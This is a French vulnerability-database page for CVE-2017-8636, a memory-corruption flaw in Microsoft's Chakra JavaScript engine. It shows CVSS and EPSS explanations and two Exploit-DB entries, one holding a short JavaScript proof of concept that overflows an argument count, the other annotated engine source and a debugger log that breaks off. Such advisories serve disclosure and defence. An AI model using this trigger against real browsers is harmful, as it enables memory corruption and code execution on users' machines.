CVE-2017-8636 : Détail

CVE-2017-8636

7.5
/
Haute
Overflow
88.74%V3
Network
2017-08-08
21h00 +00:00
2024-09-17
00h56 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V3.0 7.5 HIGH CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers).

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

High

A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

[email protected]
V2 7.6 AV:N/AC:H/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 42478

Date de publication : 2017-08-16 22h00 +00:00
Auteur : Google Security Research
EDB Vérifié : Yes

<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1315 The bytecode generator uses the "EmitNew" function to handle new operators. Here's the code how the function checks for integer overflow. void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo) { Js::ArgSlot argCount = pnode->sxCall.argCount; argCount++; // include "this" BOOL fSideEffectArgs = FALSE; unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs); Assert(argCount == tmpCount); if (argCount != (Js::ArgSlot)argCount) { Js::Throw::OutOfMemory(); } ... } "Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all. PoC: --> let args = new Array(0x10000); args = args.fill(0x1234).join(', '); eval('new Array(' + args + ')');
Exploit Database EDB-ID : 42466

Date de publication : 2017-08-16 22h00 +00:00
Auteur : Huang Anwen
EDB Vérifié : No

<!-- Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team There is an overflow when constructoring a new object with arguments which has 0xffff elements in Chakra! This issue can be reproduced steadly in uptodate Edge in Win10 WIP. //ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo) { Js::ArgSlot argCount = pnode->sxCall.argCount; //pnode->sxCall.argCount=0xFFFF argCount++; // include "this" //overflow!!!! argCount==0 BOOL fSideEffectArgs = FALSE; unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs); Assert(argCount == tmpCount); if (argCount != (Js::ArgSlot)argCount) { Js::Throw::OutOfMemory(); } byteCodeGenerator->StartStatement(pnode); // Start call, allocate out param space funcInfo->StartRecordingOutArgs(argCount); // Assign the call target operand(s), putting them into expression temps if necessary to protect // them from side-effects. if (fSideEffectArgs) { SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo); } if (pnode->sxCall.pnodeTarget->nop == knopSuper) { EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerator); } Emit(pnode->sxCall.pnodeTarget, byteCodeGenerator, funcInfo, false, true); if (pnode->sxCall.pnodeArgs == nullptr) { funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget); Js::OpCode op = (CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget)) ? Js::OpCode::NewScObjArray : Js::OpCode::NewScObject; Assert(argCount == 1); Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op); byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount); byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location, argCount, callSiteId); } else { byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount); uint32 actualArgCount = 0; if (IsCallOfConstants(pnode)) { funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget); actualArgCount = EmitNewObjectOfConstants(pnode, byteCodeGenerator, funcInfo, argCount); } else { Js::OpCode op; if ((CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget))) { op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjArraySpread : Js::OpCode::NewScObjArray; } else { op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjectSpread : Js::OpCode::NewScObject; } Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op); Js::AuxArray<uint32> *spreadIndices = nullptr; actualArgCount = EmitArgList(pnode->sxCall.pnodeArgs, Js::Constants::NoRegister, Js::Constants::NoRegister, Js::Constants::NoRegister, false, true, byteCodeGenerator, funcInfo, callSiteId, pnode->sxCall.spreadArgCount, &spreadIndices); funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget); if (pnode->sxCall.spreadArgCount > 0) { Assert(spreadIndices != nullptr); uint spreadExtraAlloc = spreadIndices->count * sizeof(uint32); uint spreadIndicesSize = sizeof(*spreadIndices) + spreadExtraAlloc; byteCodeGenerator->Writer()->CallIExtended(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location, (uint16)actualArgCount, Js::CallIExtended_SpreadArgs, spreadIndices, spreadIndicesSize, callSiteId); } else { byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location, (uint16)actualArgCount, callSiteId); } } Assert(argCount == actualArgCount); } // End call, pop param space funcInfo->EndRecordingOutArgs(argCount); return; } //ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp inline void InterpreterStackFrame::SetOut(ArgSlot_OneByte outRegisterID, Var aValue) { Assert(m_outParams + outRegisterID < m_outSp); m_outParams[outRegisterID] = aValue; //OOB Write!!!! outRegisterID could be 0~0xFFFF, but m_outParams has one element only } //ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs) { #ifdef ENABLE_DEBUG_CONFIG_OPTIONS // Support for simulating partially initialized interpreter stack frame. InterpreterThunkStackCountTracker tracker; if (CONFIG_ISENABLED(InjectPartiallyInitializedInterpreterFrameErrorFlag) && CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameError) == InterpreterThunkStackCountTracker::GetCount()) { switch (CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameErrorType)) { case 0: DebugBreak(); break; case 1: Js::JavascriptError::MapAndThrowError(function->GetScriptContext(), VBSERR_InternalError); break; default: DebugBreak(); } } #endif ScriptContext* functionScriptContext = function->GetScriptContext(); ThreadContext * threadContext = functionScriptContext->GetThreadContext(); Assert(!threadContext->IsDisableImplicitException()); functionScriptContext->VerifyAlive(!function->IsExternal()); Assert(threadContext->IsScriptActive()); Assert(threadContext->IsInScript()); FunctionBody* executeFunction = JavascriptFunction::FromVar(function)->GetFunctionBody(); #ifdef ENABLE_DEBUG_CONFIG_OPTIONS if (!isAsmJs && executeFunction->IsInDebugMode() != functionScriptContext->IsScriptContextInDebugMode()) // debug mode mismatch { if (executeFunction->GetUtf8SourceInfo()->GetIsLibraryCode()) { Assert(!executeFunction->IsInDebugMode()); // Library script byteCode is never in debug mode } else { Throw::FatalInternalError(); } } #endif if (executeFunction->GetInterpretedCount() == 0) { executeFunction->TraceInterpreterExecutionMode(); } class AutoRestore { private: ThreadContext *const threadContext; const uint8 savedLoopDepth; public: AutoRestore(ThreadContext *const threadContext, FunctionBody *const executeFunction) : threadContext(threadContext), savedLoopDepth(threadContext->LoopDepth()) { if (savedLoopDepth != 0 && !executeFunction->GetIsAsmJsFunction()) { executeFunction->SetWasCalledFromLoop(); } } ~AutoRestore() { threadContext->SetLoopDepth(savedLoopDepth); } } autoRestore(threadContext, executeFunction); #if ENABLE_PROFILE_INFO DynamicProfileInfo * dynamicProfileInfo = nullptr; const bool doProfile = executeFunction->GetInterpreterExecutionMode(false) == ExecutionMode::ProfilingInterpreter || (executeFunction->IsInDebugMode() && DynamicProfileInfo::IsEnabled(executeFunction)); if (doProfile) { #if !DYNAMIC_INTERPRETER_THUNK executeFunction->EnsureDynamicProfileInfo(); #endif dynamicProfileInfo = executeFunction->GetDynamicProfileInfo(); threadContext->ClearImplicitCallFlags(); } #else const bool doProfile = false; #endif executeFunction->IncreaseInterpretedCount(); #ifdef BGJIT_STATS functionScriptContext->interpretedCount++; functionScriptContext->maxFuncInterpret = max(functionScriptContext->maxFuncInterpret, executeFunction->GetInterpretedCount()); #endif AssertMsg(!executeFunction->IsDeferredParseFunction(), "Non-intrinsic functions must provide byte-code to execute"); executeFunction->BeginExecution(); bool fReleaseAlloc = false; InterpreterStackFrame* newInstance = nullptr; Var* allocation = nullptr; if (!isAsmJs && executeFunction->IsCoroutine()) { // If the FunctionBody is a generator then this call is being made by one of the three // generator resuming methods: next(), throw(), or return(). They all pass the generator // object as the first of two arguments. The real user arguments are obtained from the // generator object. The second argument is the ResumeYieldData which is only needed // when resuming a generator and so it only used here if a frame already exists on the // generator object. AssertMsg(args.Info.Count == 2, "Generator ScriptFunctions should only be invoked by generator APIs with the pair of arguments they pass in -- the generator object and a ResumeYieldData pointer"); JavascriptGenerator* generator = JavascriptGenerator::FromVar(args[0]); newInstance = generator->GetFrame(); if (newInstance != nullptr) { ResumeYieldData* resumeYieldData = static_cast<ResumeYieldData*>(args[1]); newInstance->SetNonVarReg(executeFunction->GetYieldRegister(), resumeYieldData); // The debugger relies on comparing stack addresses of frames to decide when a step_out is complete so // give the InterpreterStackFrame a legit enough stack address to make this comparison work. newInstance->m_stackAddress = reinterpret_cast<DWORD_PTR>(&generator); } else { // // Allocate a new InterpreterStackFrame instance on the recycler heap. // It will live with the JavascriptGenerator object. // Arguments generatorArgs = generator->GetArguments(); InterpreterStackFrame::Setup setup(function, generatorArgs); size_t varAllocCount = setup.GetAllocationVarCount(); size_t varSizeInBytes = varAllocCount * sizeof(Var); DWORD_PTR stackAddr = reinterpret_cast<DWORD_PTR>(&generator); // as mentioned above, use any stack address from this frame to ensure correct debugging functionality Var loopHeaderArray = executeFunction->GetHasAllocatedLoopHeaders() ? executeFunction->GetLoopHeaderArrayPtr() : nullptr; allocation = RecyclerNewPlus(functionScriptContext->GetRecycler(), varSizeInBytes, Var); AnalysisAssert(allocation); #if DBG // Allocate invalidVar on GC instead of stack since this InterpreterStackFrame will out live the current real frame Js::RecyclableObject* invalidVar = (Js::RecyclableObject*)RecyclerNewPlusLeaf(functionScriptContext->GetRecycler(), sizeof(Js::RecyclableObject), Var); AnalysisAssert(invalidVar); memset(reinterpret_cast<void*>(invalidVar), 0xFE, sizeof(Js::RecyclableObject)); newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr, invalidVar); #else newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr); #endif newInstance->m_reader.Create(executeFunction); generator->SetFrame(newInstance, varSizeInBytes); } } else { InterpreterStackFrame::Setup setup(function, args); size_t varAllocCount = setup.GetAllocationVarCount(); size_t varSizeInBytes = varAllocCount * sizeof(Var); // // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack. // DWORD_PTR stackAddr; // If the locals area exceeds a certain limit, allocate it from a private arena rather than // this frame. The current limit is based on an old assert on the number of locals we would allow here. if (varAllocCount > InterpreterStackFrame::LocalsThreshold) { ArenaAllocator *tmpAlloc = nullptr; fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc); allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes); stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step) } else { PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes); allocation = (Var*)_alloca(varSizeInBytes); #if DBG memset(allocation, 0xFE, varSizeInBytes); #endif stackAddr = reinterpret_cast<DWORD_PTR>(allocation); } /* * If the function has any loop headers, we allocate an array for the loop headers wrappers, and * reference the wrappers in the array. We then push the pointer to the array onto the stack itself. * We do this so that while the function is being interpreted, we don't want the jitted loop * bodies to be collected, even if the loop body isn't being executed. The loop body will * get collected when the function has been JITted, and when the function exits the interpreter. * The array contains nulls if the loop body isn't jitted (or hasn't been jitted yet) but * it's cheaper to just copy them all into the recycler array rather than just the ones that * have been jitted. */ Var loopHeaderArray = nullptr; if (executeFunction->GetHasAllocatedLoopHeaders()) { // Loop header array is recycler allocated, so we push it on the stack // When we scan the stack, we'll recognize it as a recycler allocated // object, and mark it's contents and keep the individual loop header // wrappers alive loopHeaderArray = executeFunction->GetLoopHeaderArrayPtr(); } #if DBG Js::RecyclableObject * invalidStackVar = (Js::RecyclableObject*)_alloca(sizeof(Js::RecyclableObject)); memset(reinterpret_cast<void*>(invalidStackVar), 0xFE, sizeof(Js::RecyclableObject)); newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr, invalidStackVar); #else newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr); #endif newInstance->m_reader.Create(executeFunction); } // // Execute the function's byte-code, returning the return-value: // - Mark that the function is current executing and may not be modified. // #if ENABLE_TTD TTD::TTDExceptionFramePopper exceptionFramePopper; if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext)) { bool isInFinally = ((newInstance->m_flags & Js::InterpreterStackFrameFlags_WithinFinallyBlock) == Js::InterpreterStackFrameFlags_WithinFinallyBlock); threadContext->TTDExecutionInfo->PushCallEvent(function, args.Info.Count, args.Values, isInFinally); exceptionFramePopper.PushInfo(threadContext->TTDExecutionInfo, function); } #endif Var aReturn = nullptr; { if (!isAsmJs && executeFunction->IsInDebugMode()) { #if DYNAMIC_INTERPRETER_THUNK PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress); aReturn = newInstance->DebugProcess(); #else aReturn = newInstance->DebugProcessThunk(_ReturnAddress(), _AddressOfReturnAddress()); #endif } else { #if DYNAMIC_INTERPRETER_THUNK PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress); aReturn = newInstance->Process(); #else aReturn = newInstance->ProcessThunk(_ReturnAddress(), _AddressOfReturnAddress()); #endif } } executeFunction->EndExecution(); #if ENABLE_TTD if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext)) { exceptionFramePopper.PopInfo(); threadContext->TTDExecutionInfo->PopCallEvent(function, aReturn); } #endif if (fReleaseAlloc) { functionScriptContext->ReleaseInterpreterArena(); } #if ENABLE_PROFILE_INFO if (doProfile) { dynamicProfileInfo->RecordImplicitCallFlags(threadContext->GetImplicitCallFlags()); } #endif if (isAsmJs) { return newInstance; } return aReturn; } Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 00007ff6`1e3c0000 00007ff6`1e3e5000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe ModLoad: 00007ffe`a1ea0000 00007ffe`a207b000 C:\Windows\SYSTEM32\ntdll.dll ModLoad: 00007ffe`a0a70000 00007ffe`a0b1e000 C:\Windows\System32\KERNEL32.DLL ModLoad: 00007ffe`9e590000 00007ffe`9e7d9000 C:\Windows\System32\KERNELBASE.dll ModLoad: 00007ffe`9c900000 00007ffe`9c97e000 C:\Windows\SYSTEM32\apphelp.dll ModLoad: 00007ffe`a0ee0000 00007ffe`a11d9000 C:\Windows\System32\combase.dll ModLoad: 00007ffe`9e7e0000 00007ffe`9e8d6000 C:\Windows\System32\ucrtbase.dll ModLoad: 00007ffe`a0d00000 00007ffe`a0e25000 C:\Windows\System32\RPCRT4.dll ModLoad: 00007ffe`9ebc0000 00007ffe`9ec2a000 C:\Windows\System32\bcryptPrimitives.dll ModLoad: 00007ffe`a0c50000 00007ffe`a0ced000 C:\Windows\System32\msvcrt.dll ModLoad: 00007ffe`98900000 00007ffe`98960000 C:\Windows\SYSTEM32\wincorlib.DLL ModLoad: 00007ffe`a1de0000 00007ffe`a1ea0000 C:\Windows\System32\OLEAUT32.dll ModLoad: 00007ffe`9ea70000 00007ffe`9eb0a000 C:\Windows\System32\msvcp_win.dll ModLoad: 00007ffe`9e330000 00007ffe`9e341000 C:\Windows\System32\kernel.appcore.dll ModLoad: 00007ffe`7d930000 00007ffe`7dcf4000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll ModLoad: 00007ffe`9ece0000 00007ffe`9f3d2000 C:\Windows\System32\Windows.Storage.dll ModLoad: 00007ffe`a0b90000 00007ffe`a0c31000 C:\Windows\System32\advapi32.dll ModLoad: 00007ffe`9f400000 00007ffe`9f459000 C:\Windows\System32\sechost.dll ModLoad: 00007ffe`96080000 00007ffe`96306000 C:\Windows\SYSTEM32\iertutil.dll ModLoad: 00007ffe`a13b0000 00007ffe`a1401000 C:\Windows\System32\shlwapi.dll ModLoad: 00007ffe`a0e30000 00007ffe`a0eda000 C:\Windows\System32\shcore.dll ModLoad: 00007ffe`9f460000 00007ffe`9f487000 C:\Windows\System32\GDI32.dll ModLoad: 00007ffe`9e8e0000 00007ffe`9ea69000 C:\Windows\System32\gdi32full.dll ModLoad: 00007ffe`a1c90000 00007ffe`a1dda000 C:\Windows\System32\USER32.dll ModLoad: 00007ffe`9f3e0000 00007ffe`9f3fe000 C:\Windows\System32\win32u.dll ModLoad: 00007ffe`9e370000 00007ffe`9e3bc000 C:\Windows\System32\powrprof.dll ModLoad: 00007ffe`9e310000 00007ffe`9e325000 C:\Windows\System32\profapi.dll ModLoad: 00007ffe`9e210000 00007ffe`9e239000 C:\Windows\SYSTEM32\USERENV.dll ModLoad: 00007ffe`8d040000 00007ffe`8d066000 C:\Windows\SYSTEM32\clipc.dll ModLoad: 00007ffe`9d610000 00007ffe`9d641000 C:\Windows\SYSTEM32\ntmarta.dll ModLoad: 00007ffe`9dd60000 00007ffe`9dd77000 C:\Windows\SYSTEM32\cryptsp.dll ModLoad: 00007ffe`9d9a0000 00007ffe`9da44000 C:\Windows\SYSTEM32\DNSAPI.dll ModLoad: 00007ffe`a18b0000 00007ffe`a191c000 C:\Windows\System32\WS2_32.dll ModLoad: 00007ffe`a0b20000 00007ffe`a0b28000 C:\Windows\System32\NSI.dll ModLoad: 00007ffe`a0a40000 00007ffe`a0a6d000 C:\Windows\System32\IMM32.DLL ModLoad: 00007ffe`9d960000 00007ffe`9d997000 C:\Windows\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffe`9ccc0000 00007ffe`9ce30000 C:\Windows\SYSTEM32\twinapi.appcore.dll ModLoad: 00007ffe`9e1e0000 00007ffe`9e205000 C:\Windows\SYSTEM32\bcrypt.dll ModLoad: 00007ffe`9d440000 00007ffe`9d461000 C:\Windows\SYSTEM32\profext.dll ModLoad: 00007ffe`8c940000 00007ffe`8c9b4000 C:\Windows\SYSTEM32\msiso.dll ModLoad: 00007ffe`983e0000 00007ffe`98402000 C:\Windows\SYSTEM32\EShims.dll ModLoad: 00007ffe`90b10000 00007ffe`90b2b000 C:\Windows\SYSTEM32\MPR.dll ModLoad: 00007ffe`a1920000 00007ffe`a1a65000 C:\Windows\System32\ole32.dll ModLoad: 00007ffe`9cab0000 00007ffe`9cb45000 C:\Windows\system32\uxtheme.dll ModLoad: 00007ffe`8b6f0000 00007ffe`8b791000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll ModLoad: 00007ffe`81fa0000 00007ffe`83651000 C:\Windows\SYSTEM32\edgehtml.dll ModLoad: 00007ffe`9a690000 00007ffe`9a7c9000 C:\Windows\SYSTEM32\wintypes.dll ModLoad: 00007ffe`915c0000 00007ffe`915ff000 C:\Windows\SYSTEM32\MLANG.dll ModLoad: 00007ffe`80f50000 00007ffe`8173a000 C:\Windows\SYSTEM32\chakra.dll ModLoad: 00007ffe`9afe0000 00007ffe`9b056000 C:\Windows\SYSTEM32\policymanager.dll ModLoad: 00007ffe`9af20000 00007ffe`9afaf000 C:\Windows\SYSTEM32\msvcp110_win.dll ModLoad: 00007ffe`9b2d0000 00007ffe`9b466000 C:\Windows\SYSTEM32\PROPSYS.dll ModLoad: 00007ffe`88e90000 00007ffe`88f5b000 C:\Windows\System32\ieproxy.dll ModLoad: 00007ffe`98590000 00007ffe`98696000 C:\Windows\System32\Windows.UI.dll ModLoad: 00007ffe`98500000 00007ffe`98582000 C:\Windows\SYSTEM32\TextInputFramework.dll ModLoad: 00007ffe`99ad0000 00007ffe`99da2000 C:\Windows\SYSTEM32\CoreUIComponents.dll ModLoad: 00007ffe`9c1d0000 00007ffe`9c2b3000 C:\Windows\SYSTEM32\CoreMessaging.dll ModLoad: 00007ffe`9ae40000 00007ffe`9ae55000 C:\Windows\SYSTEM32\usermgrcli.dll ModLoad: 00007ffe`98f20000 00007ffe`99451000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll ModLoad: 00007ffe`9b470000 00007ffe`9b49a000 C:\Windows\SYSTEM32\dwmapi.dll ModLoad: 00007ffe`9f490000 00007ffe`a08c7000 C:\Windows\System32\shell32.dll ModLoad: 00007ffe`9ec30000 00007ffe`9ec79000 C:\Windows\System32\cfgmgr32.dll ModLoad: 00007ffe`a08d0000 00007ffe`a0a36000 C:\Windows\System32\msctf.dll ModLoad: 00007ffe`98700000 00007ffe`98802000 C:\Windows\SYSTEM32\mrmcorer.dll ModLoad: 00007ffe`8d070000 00007ffe`8d39e000 C:\Windows\SYSTEM32\WININET.dll ModLoad: 00007ffe`9e240000 00007ffe`9e270000 C:\Windows\SYSTEM32\SspiCli.dll ModLoad: 00007ffe`98860000 00007ffe`988c9000 C:\Windows\SYSTEM32\Bcp47Langs.dll ModLoad: 00007ffe`8a7c0000 00007ffe`8a7d0000 C:\Windows\SYSTEM32\tokenbinding.dll ModLoad: 00007ffe`8d800000 00007ffe`8d81b000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll ModLoad: 00007ffe`963d0000 00007ffe`964a7000 C:\Windows\SYSTEM32\winhttp.dll ModLoad: 00007ffe`9dbc0000 00007ffe`9dc1c000 C:\Windows\system32\mswsock.dll ModLoad: 00007ffe`9a290000 00007ffe`9a29b000 C:\Windows\SYSTEM32\WINNSI.DLL ModLoad: 00007ffe`957f0000 00007ffe`959b8000 C:\Windows\SYSTEM32\urlmon.dll ModLoad: 00007ffe`9dd80000 00007ffe`9dd8b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL ModLoad: 00007ffe`8ca20000 00007ffe`8ca3a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll ModLoad: 00007ffe`7fed0000 00007ffe`8005a000 C:\Windows\SYSTEM32\ieapfltr.dll ModLoad: 00007ffe`999d0000 00007ffe`999ed000 C:\Windows\System32\rmclient.dll ModLoad: 00007ffe`89aa0000 00007ffe`89ab8000 C:\Windows\System32\UiaManager.dll ModLoad: 00007ffe`8a860000 00007ffe`8a8a7000 C:\Windows\system32\dataexchange.dll ModLoad: 00007ffe`9c2c0000 00007ffe`9c3e2000 C:\Windows\SYSTEM32\dcomp.dll ModLoad: 00007ffe`9b940000 00007ffe`9bc1f000 C:\Windows\SYSTEM32\d3d11.dll ModLoad: 00007ffe`9d180000 00007ffe`9d224000 C:\Windows\SYSTEM32\dxgi.dll ModLoad: 00007ffe`8bb90000 00007ffe`8bc12000 C:\Windows\system32\twinapi.dll ModLoad: 00007ffe`84db0000 00007ffe`84e2a000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll ModLoad: 00007ffe`81c30000 00007ffe`81c58000 C:\Windows\SYSTEM32\srpapi.dll ModLoad: 00007ffe`9e3c0000 00007ffe`9e589000 C:\Windows\System32\CRYPT32.dll ModLoad: 00007ffe`9e350000 00007ffe`9e361000 C:\Windows\System32\MSASN1.dll ModLoad: 00007ffe`846e0000 00007ffe`8473a000 C:\Windows\System32\Windows.Graphics.dll ModLoad: 00007ffe`8cf00000 00007ffe`8cf5d000 C:\Windows\SYSTEM32\ninput.dll ModLoad: 00007ffe`9bc20000 00007ffe`9c1c4000 C:\Windows\SYSTEM32\d2d1.dll ModLoad: 00007ffe`943a0000 00007ffe`94660000 C:\Windows\SYSTEM32\DWrite.dll ModLoad: 00007ffe`81910000 00007ffe`8191f000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll ModLoad: 00007ffe`99510000 00007ffe`99552000 C:\Windows\SYSTEM32\vm3dum64.dll ModLoad: 00007ffe`994a0000 00007ffe`99507000 C:\Windows\SYSTEM32\D3D10Level9.dll ModLoad: 00007ffe`8b4b0000 00007ffe`8b51b000 C:\Windows\System32\oleacc.dll ModLoad: 00007ffe`81bf0000 00007ffe`81c00000 C:\Windows\system32\msimtf.dll ModLoad: 00007ffe`940f0000 00007ffe`94178000 C:\Windows\system32\directmanipulation.dll ModLoad: 00007ffe`98170000 00007ffe`98184000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll ModLoad: 00007ffe`81bb0000 00007ffe`81be8000 